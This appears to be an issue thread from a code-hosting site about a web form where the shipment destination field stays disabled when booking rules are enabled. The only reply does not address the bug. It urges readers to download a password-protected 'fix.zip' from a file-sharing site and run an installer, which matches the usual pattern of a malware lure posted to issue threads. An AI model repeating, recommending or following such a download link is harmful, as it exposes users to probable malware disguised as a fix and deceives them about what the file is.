### ISSUE TITLE
Outgoing Shipment - Not able to add destination location so cannot create outgoing shipment with full validations

### ISSUE THREAD

**Issue by rashmipragya** [rashmipragya/WebBoard#2]
When booking rules are enabled, and user is trying to create outgoing shipment, shipment destination location is not editable. It is disabled

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
